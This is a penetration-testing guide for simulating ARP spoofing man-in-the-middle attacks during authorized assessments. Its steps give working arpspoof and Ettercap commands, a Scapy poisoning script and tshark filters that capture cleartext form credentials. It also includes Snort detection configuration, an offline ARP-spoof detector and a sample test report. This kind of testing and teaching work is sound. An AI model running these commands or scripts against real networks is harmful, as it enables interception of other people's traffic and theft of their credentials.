Performing ARP Spoofing Attack Simulation
When to Use
- Testing whether network switches and infrastructure properly implement Dynamic ARP Inspection (DAI)
- Demonstrating man-in-the-middle attack risks to stakeholders during authorized security assessments
- Validating that network monitoring tools (IDS/IPS, SIEM) detect ARP cache poisoning attempts
- Assessing the effectiveness of port security, 802.1X, and VLAN segmentation controls
- Training SOC analysts to recognize ARP spoofing indicators in network traffic
Do not use on production networks without explicit written authorization and a rollback plan, against networks carrying critical or life-safety traffic, or as a denial-of-service attack vector.
Prerequisites
- Written authorization specifying in-scope network segments for ARP spoofing simulation
- Kali Linux or similar penetration testing distribution with arpspoof, Ettercap, and Scapy installed
- Direct Layer 2 access to the target network segment (same VLAN as target hosts)
- IP forwarding knowledge and ability to enable/disable packet forwarding on the attacker machine
- Wireshark or tcpdump for capturing traffic to verify interception
- Isolated lab environment or approved production test window
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
Workflow
Step 1: Enumerate the Target Network Segment
```bash
# Discover hosts on the local subnet with an ARP ping sweep (-PR needs raw sockets, hence sudo)
sudo nmap -sn -PR 192.168.1.0/24 -oG arp_discovery.txt

# Identify the default gateway
ip route show default
# Output: default via 192.168.1.1 dev eth0

# Identify target hosts and their MAC addresses (arp-scan also needs root)
sudo arp-scan -l -I eth0

# Verify the current ARP table (ip neigh show is the iproute2 equivalent of arp -a)
arp -a

# Note the gateway IP (192.168.1.1) and target host IP (192.168.1.50).
# Record their legitimate MAC addresses now: you will need them to verify the
# poisoning in Step 6 and to confirm the caches are clean after cleanup.
```
Step 2: Enable IP Forwarding
```bash
# Enable IPv4 forwarding so packets the victim sends us are relayed on to the
# gateway (and back). Without it the victim simply loses connectivity: a denial
# of service rather than a transparent man-in-the-middle.
sudo sysctl -w net.ipv4.ip_forward=1

# Verify forwarding is enabled (should print 1)
cat /proc/sys/net/ipv4/ip_forward

# Optional: suppress ICMP redirects. When the kernel forwards a victim packet back
# out the same interface it arrived on, it would otherwise send the victim an ICMP
# redirect pointing at the real gateway, which can undo the interception and is
# itself a visible indicator on the wire.
sudo sysctl -w net.ipv4.conf.all.send_redirects=0
sudo sysctl -w net.ipv4.conf.eth0.send_redirects=0
```
Step 3: Execute ARP Spoofing with arpspoof
```bash
# Poison both directions with a single process: -t is the target whose cache we
# poison, the final argument is the host whose address we claim toward it, and -r
# additionally poisons that host with the target's address (bidirectional).
sudo arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.1

# Equivalent without -r: one one-way process per direction, each in its own terminal
sudo arpspoof -i eth0 -t 192.168.1.50 192.168.1.1
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.50

# Alternative: Ettercap unified bidirectional spoofing. The "remote" option is needed
# when one target is the gateway, so traffic to hosts beyond it is intercepted too.
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.50// /192.168.1.1//
```
Step 4: Capture and Analyze Intercepted Traffic
```bash
# Capture all traffic to and from the victim that now flows through the attacker machine
sudo tcpdump -i eth0 -w mitm_capture.pcap host 192.168.1.50

# Print HTTP POST form fields in real time. Only cleartext HTTP is readable this way:
# TLS sessions are still relayed through the attacker but their payloads stay encrypted.
sudo tshark -i eth0 -Y "http.request.method == POST" \
  -T fields -e ip.src -e http.host -e http.request.uri -e urlencoded-form.value

# Capture DNS queries from the victim
sudo tshark -i eth0 -Y "dns.qry.name and ip.src == 192.168.1.50" \
  -T fields -e frame.time -e dns.qry.name

# Run Ettercap with its built-in credential dissectors (active in -T text mode) and
# write the full capture to a pcap for later analysis
sudo ettercap -T -q -i eth0 -w ettercap_capture.pcap \
  -M arp:remote /192.168.1.50// /192.168.1.1//
```
Step 5: Demonstrate Impact with Scapy (Custom ARP Packets)
```python
#!/usr/bin/env python3
"""ARP spoofing demonstration using Scapy for authorized security testing.

Run as root with IP forwarding enabled (Step 2); otherwise the victim loses
connectivity instead of being transparently intercepted.
"""
import sys
import time

from scapy.all import ARP, Ether, conf, sendp, srp

conf.verb = 0


def get_mac(ip, iface="eth0"):
    """Resolve an IP to its MAC address with a broadcast ARP request."""
    ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
                 timeout=2, iface=iface)
    if ans:
        return ans[0][1].hwsrc
    return None


def spoof(target_ip, spoof_ip, target_mac, iface="eth0"):
    """Send one unsolicited ARP reply telling target_ip that spoof_ip is at our MAC.

    hwsrc is left unset so Scapy fills in this interface's own MAC address.
    """
    packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    sendp(Ether(dst=target_mac) / packet, iface=iface, verbose=False)


def restore(target_ip, gateway_ip, target_mac, gateway_mac, iface="eth0"):
    """Re-ARP: tell target_ip the legitimate MAC for gateway_ip, several times.

    The Ethernet source is set to the legitimate MAC as well, so hosts that
    cross-check the frame header against the ARP payload accept the update.
    """
    packet = ARP(op=2, pdst=target_ip, hwdst=target_mac,
                 psrc=gateway_ip, hwsrc=gateway_mac)
    sendp(Ether(src=gateway_mac, dst=target_mac) / packet,
          iface=iface, count=5, verbose=False)


if __name__ == "__main__":
    target_ip = "192.168.1.50"
    gateway_ip = "192.168.1.1"
    iface = "eth0"

    target_mac = get_mac(target_ip, iface)
    gateway_mac = get_mac(gateway_ip, iface)
    if not target_mac or not gateway_mac:
        print("[!] Could not resolve MAC addresses. Exiting.")
        sys.exit(1)

    print(f"[*] Target: {target_ip} ({target_mac})")
    print(f"[*] Gateway: {gateway_ip} ({gateway_mac})")
    print("[*] Starting ARP spoofing... Press Ctrl+C to stop.")
    packets_sent = 0
    try:
        while True:
            spoof(target_ip, gateway_ip, target_mac, iface)   # victim: gateway is-at us
            spoof(gateway_ip, target_ip, gateway_mac, iface)  # gateway: victim is-at us
            packets_sent += 2
            print(f"\r[*] Packets sent: {packets_sent}", end="")
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[*] Restoring ARP tables...")
    finally:
        # Always re-ARP on the way out, whatever stopped the loop
        restore(target_ip, gateway_ip, target_mac, gateway_mac, iface)
        restore(gateway_ip, target_ip, gateway_mac, target_mac, iface)
        print("[*] ARP tables restored. Exiting.")
```
Step 6: Verify Detection and Cleanup
```bash
# On the target machine, check for ARP cache poisoning indicators
arp -a | grep 192.168.1.1        # or: ip neigh show 192.168.1.1
# If spoofed, the gateway entry shows the attacker's MAC instead of the one recorded in Step 1

# Check IDS/SIEM for ARP spoofing alerts. Snort rules have no "arp" protocol keyword,
# so ARP detection comes from the arpspoof preprocessor, which pins the gateway's
# legitimate MAC and raises GID 112 alerts (SID 4 "Attempted ARP cache overwrite
# attack" for a reply that contradicts the pinned binding). Snort 2, snort.conf:
#   preprocessor arpspoof
#   preprocessor arpspoof_detect_host: 192.168.1.1 00:aa:bb:cc:dd:01
# Snort 3 equivalent, snort.lua:
#   arp_spoof = { hosts = { { ip = '192.168.1.1', mac = '00:aa:bb:cc:dd:01' } } }

# Stop the attack and restore ARP tables: Ctrl+C in the arpspoof/ettercap/Scapy sessions.
# arpspoof and the Scapy script in Step 5 re-ARP the legitimate MACs on exit.

# Disable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=0

# Manually restore ARP entries on affected hosts (if the re-ARP did not take)
# On target:  sudo arp -d 192.168.1.1 && ping -c 1 192.168.1.1
# On gateway: sudo arp -d 192.168.1.50 && ping -c 1 192.168.1.50   (syntax depends on the gateway OS)

# Verify the MAC addresses match the legitimate values recorded in Step 1
arp -a
```
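The "validate that monitoring tools detect ARP cache poisoning" use case and the detection check in Step 6 both come down to a handful of wire-level indicators. The following is an added example, not code from the original page, that implements those indicators as an offline detector over raw Ethernet/ARP frames: a reply without a matching request, an Ethernet source that disagrees with the ARP sender field, a reply contradicting an operator-pinned binding (the gateway, as the Snort arpspoof preprocessor pins it), a change to a learned binding (the arpwatch-style "flip flop"), and a per-sender reply rate. The traffic it analyses is constructed inline and is assumed, not captured; the addresses are the ones this page uses in its sample report.

```python
#!/usr/bin/env python3
"""Offline ARP spoofing detector over raw Ethernet/ARP frames (added example, not page code).

Per ARP reply it checks: Ethernet/ARP sender mismatch, reply without a matching request,
violation of a pinned binding, change of a learned binding, and reply rate per sender MAC.
Sample traffic is constructed below with the addresses from this page's sample report.
"""
import struct
from collections import defaultdict, deque

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_str(b): return ":".join(f"{x:02x}" for x in b)
def ip_str(b): return ".".join(str(x) for x in b)
def mac_bytes(s): return bytes(int(x, 16) for x in s.split(":"))
def ip_bytes(s): return bytes(int(x) for x in s.split("."))


def parse_arp(frame):
    """Parse an Ethernet II frame carrying IPv4-over-Ethernet ARP; None for anything else."""
    if len(frame) < 42:
        return None
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return {"eth_src": mac_str(eth_src), "eth_dst": mac_str(eth_dst), "op": op,
            "sha": mac_str(sha), "spa": ip_str(spa), "tha": mac_str(tha), "tpa": ip_str(tpa)}


def build_arp(eth_src, eth_dst, op, sha, spa, tha, tpa):
    """Build a raw Ethernet/ARP frame; used here only to construct sample traffic."""
    eth = struct.pack("!6s6sH", mac_bytes(eth_dst), mac_bytes(eth_src), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      mac_bytes(sha), ip_bytes(spa), mac_bytes(tha), ip_bytes(tpa))
    return eth + arp


class ArpSpoofDetector:
    """Stateful indicator checks over a stream of (timestamp, frame) observations."""

    def __init__(self, trusted=None, rate_limit=30, window=10.0):
        self.trusted = dict(trusted or {})   # ip -> mac pinned by the operator (gateway, servers)
        self.learned = {}                    # ip -> first mac seen claiming it on the wire
        self.pending = set()                 # (requester ip, requested ip) awaiting a reply
        self.replies = defaultdict(deque)    # sender mac -> timestamps of its replies
        self.rate_limit, self.window = rate_limit, window

    def observe(self, ts, frame):
        """Inspect one frame seen at time ts (seconds); return the alerts it raised."""
        arp = parse_arp(frame)
        if arp is None:
            return []
        if arp["op"] == ARP_REQUEST:
            self.pending.add((arp["spa"], arp["tpa"]))
        if arp["op"] != ARP_REPLY:
            return []
        sha, spa, tpa = arp["sha"], arp["spa"], arp["tpa"]
        alerts = []
        if arp["eth_src"] != sha:            # frame header and ARP payload disagree on the sender
            alerts.append(f"ethernet/ARP sender mismatch: frame from {arp['eth_src']}, ARP claims {sha}")
        if (tpa, spa) in self.pending:       # this reply answers a request we saw
            self.pending.discard((tpa, spa))
        else:
            alerts.append(f"unsolicited reply: {spa} is-at {sha}, sent to {tpa}")
        pinned = self.trusted.get(spa)
        if pinned and pinned != sha:
            alerts.append(f"trusted binding violated: {spa} is pinned to {pinned}, reply claims {sha}")
        prev = self.learned.setdefault(spa, sha)   # first MAC seen for spa stays the reference
        if prev != sha:
            alerts.append(f"binding changed: {spa} was {prev}, now {sha}")
        q = self.replies[sha]
        q.append(ts)
        while ts - q[0] > self.window:       # slide the rate window
            q.popleft()
        if len(q) == self.rate_limit + 1:    # alert once, when the threshold is first crossed
            alerts.append(f"reply rate: {sha} sent more than {self.rate_limit} replies in {self.window:g}s")
        return alerts


# Constructed addresses (from the page's sample report), not a real capture
GATEWAY = ("192.168.1.1", "00:aa:bb:cc:dd:01")
VICTIM = ("192.168.1.50", "00:11:22:33:44:55")
ATTACKER = ("192.168.1.99", "aa:bb:cc:dd:ee:ff")
BROADCAST, UNKNOWN = "ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"


def sample_traffic():
    """One legitimate resolution, a 4-reply/s poisoning burst, then one forged-header reply."""
    frames = [
        (0.0, build_arp(VICTIM[1], BROADCAST, ARP_REQUEST, VICTIM[1], VICTIM[0], UNKNOWN, GATEWAY[0])),
        (0.1, build_arp(GATEWAY[1], VICTIM[1], ARP_REPLY, GATEWAY[1], GATEWAY[0], VICTIM[1], VICTIM[0])),
    ]
    for i in range(40):   # "192.168.1.1 is-at <attacker MAC>" pushed at the victim every 250 ms
        frames.append((1.0 + 0.25 * i, build_arp(ATTACKER[1], VICTIM[1], ARP_REPLY,
                                                 ATTACKER[1], GATEWAY[0], VICTIM[1], VICTIM[0])))
    # Same poison with the Ethernet source forged to the gateway's MAC (evades a naive MAC blocklist)
    frames.append((20.0, build_arp(GATEWAY[1], VICTIM[1], ARP_REPLY,
                                   ATTACKER[1], GATEWAY[0], VICTIM[1], VICTIM[0])))
    return frames


def run_demo():
    """Feed the constructed traffic through the detector; returns [(timestamp, alert), ...]."""
    det = ArpSpoofDetector(trusted={GATEWAY[0]: GATEWAY[1]}, rate_limit=30, window=10.0)
    return [(ts, alert) for ts, frame in sample_traffic() for alert in det.observe(ts, frame)]


if __name__ == "__main__":
    for ts, alert in run_demo():
        print(f"t={ts:6.2f}s  {alert}")
```

The legitimate request/reply pair raises nothing; every poisoned reply raises the unsolicited, pinned-binding and binding-changed alerts, the rate alert fires once when the 31st reply lands inside the 10 s window, and the forged-header frame additionally trips the Ethernet/ARP mismatch check (the condition Snort's arpspoof preprocessor reports as a mismatch alert). To run it live rather than offline, feed `observe()` from an `AF_PACKET` raw socket or a pcap reader; in production the "unsolicited" check needs a warm-up period or a suppression list for known-good bindings, since a reply to a request the sensor never saw is otherwise indistinguishable from an attack.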
Key Concepts
| Term | Definition |
|---|---|
| ARP Cache Poisoning | Technique of sending fraudulent ARP replies to associate the attacker's MAC address with another host's IP address in the target's ARP cache |
| Gratuitous / Unsolicited ARP | ARP packet sent without a corresponding request. A true gratuitous ARP announces a host's own IP-to-MAC pair (sender and target IP are equal); spoofing tools such as arpspoof instead send unsolicited ARP replies (opcode 2) addressed to the victim, which most stacks accept and use to overwrite their cache entry |
| Dynamic ARP Inspection (DAI) | Switch-level security feature that validates ARP packets against the DHCP snooping binding database and drops invalid ARP traffic |
| IP Forwarding | Kernel-level setting that allows a host to relay packets not addressed to itself (in a MITM, back out the same interface toward the real gateway or victim), required for transparent man-in-the-middle interception; without it the victim simply loses connectivity |
| DHCP Snooping | Switch security feature that builds a trusted binding table of IP-to-MAC-to-port mappings, serving as the foundation for DAI validation |
Tools & Systems
- arpspoof (dsniff suite): Simple command-line tool that sends continuous spoofed ARP replies to redirect traffic between two targets
- Ettercap: Comprehensive suite for man-in-the-middle attacks supporting ARP spoofing, DNS spoofing, content filtering, and credential capture
- Scapy: Python packet manipulation library for crafting custom ARP packets with full control over all header fields
- arp-scan: Network scanning tool that sends ARP requests to discover all hosts on a local network segment
- Wireshark: Packet analyzer for verifying ARP spoofing success and capturing intercepted traffic for analysis
Common Scenarios
Scenario: Testing Dynamic ARP Inspection Effectiveness on Enterprise Switches
场景:测试企业交换机上动态ARP检测的有效性
Context: A network team deployed Cisco DAI on all access-layer switches and needs to validate that ARP spoofing attempts are properly detected and blocked. The test is authorized on a dedicated VLAN (VLAN 100) with three test hosts and one attacker machine connected to the same switch.
Approach:
- Document baseline ARP tables on all hosts and the legitimate MAC-IP bindings in the DHCP snooping database
- Run arpspoof from the attacker machine targeting the default gateway and a test workstation
- Verify that the switch drops spoofed ARP packets by checking DAI statistics: `show ip arp inspection statistics vlan 100`
- Confirm the test workstation's ARP cache still shows the legitimate gateway MAC address
- Temporarily disable DAI on the test VLAN and repeat the attack to confirm it succeeds without the control
- Re-enable DAI and document results showing the control is effective
- Verify that IDS alerts were generated for both the blocked and unblocked attack attempts
Pitfalls:
- Running ARP spoofing on a VLAN without DAI and accidentally disrupting legitimate traffic
- Forgetting to enable IP forwarding, causing a denial-of-service instead of transparent interception
- Not restoring ARP tables after testing, leaving hosts with stale cache entries
- Testing on a trunk port instead of an access port, potentially affecting multiple VLANs
Output Format
ARP Spoofing Simulation Report
Test ID: NET-ARP-001
Date: 2024-03-15 14:00-15:00 UTC
Target VLAN: VLAN 100 (192.168.1.0/24)
Attacker: 192.168.1.99 (AA:BB:CC:DD:EE:FF)
Target: 192.168.1.50 (00:11:22:33:44:55)
Gateway: 192.168.1.1 (00:AA:BB:CC:DD:01)
Test Results
| Test | DAI Status | ARP Spoof Result | Traffic Intercepted |
|---|---|---|---|
| Test 1 | Enabled | Blocked (switch dropped 847 packets) | No |
| Test 2 | Disabled | Successful (target ARP cache poisoned) | Yes - 23 HTTP sessions |
| Test 3 | Re-enabled | Blocked | No |
Detection Coverage
- DAI: PASS - Dropped all spoofed ARP replies when enabled
- IDS (Snort): PASS - arpspoof preprocessor raised GID 112 alerts within 15 seconds
- SIEM: PASS - Alert correlated and escalated within 2 minutes
Recommendations
- Maintain DAI enabled on all access VLANs (currently disabled on VLANs 200, 210)
- Enable DHCP snooping rate limiting to prevent DHCP starvation attacks
- Deploy 802.1X port authentication to complement ARP inspection